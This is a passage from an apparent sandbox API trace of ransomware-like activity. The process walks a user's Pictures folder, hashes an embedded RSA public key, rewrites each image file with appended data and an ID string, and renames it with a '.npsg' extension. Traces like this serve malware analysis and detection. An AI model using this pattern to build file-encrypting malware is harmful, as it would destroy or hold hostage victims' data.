(HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ce8 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.287] GetCurrentThreadId () returned 0x5b4 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88008 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.288] GetCurrentThreadId () returned 0x5b4 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d40 [0239.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ce8 [0239.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d00 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d18 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d30 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d48 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d60 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d48 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d30 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d40 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d60 | out: hHeap=0x620000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d18 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ce8 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d00 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d58 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86750 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.293] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x171bf, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x171bf, lpOverlapped=0x0) returned 1 [0239.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.293] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x171c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.294] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.294] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.294] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.294] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.294] CloseHandle (hObject=0x644) returned 1 [0239.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0239.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b89cd0 [0239.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.296] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\beRk2Co7nrbQC1C4dKk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\berk2co7nrbqc1c4dkk.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\beRk2Co7nrbQC1C4dKk.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\berk2co7nrbqc1c4dkk.gif.npsg")) returned 1 [0239.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.298] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0239.299] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e28a960, ftCreationTime.dwHighDateTime=0x1d5b6ac, ftLastAccessTime.dwLowDateTime=0x2d518250, ftLastAccessTime.dwHighDateTime=0x1d5bd1f, ftLastWriteTime.dwLowDateTime=0x2d518250, ftLastWriteTime.dwHighDateTime=0x1d5bd1f, nFileSizeHigh=0x0, nFileSizeLow=0x89e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dGrR4M VZK.bmp", cAlternateFileName="DGRR4M~1.BMP")) returned 1 [0239.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.299] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\dGrR4M VZK.bmp") returned=".bmp" [0239.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\dGrR4M VZK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\dgrr4m vzk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.300] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=35296) returned 1 [0239.300] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.303] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x89ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.303] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.305] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.305] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x89e0, lpOverlapped=0x0) returned 1 [0239.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.306] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.310] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.310] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.310] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.310] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.310] GetLastError () returned 0x0 [0239.310] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.310] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.311] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.311] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.311] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.311] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.312] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x89e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.312] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.312] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.312] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.312] CloseHandle (hObject=0x644) returned 1 [0239.321] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\dGrR4M VZK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\dgrr4m vzk.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\dGrR4M VZK.bmp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\dgrr4m vzk.bmp.npsg")) returned 1 [0239.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.322] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: 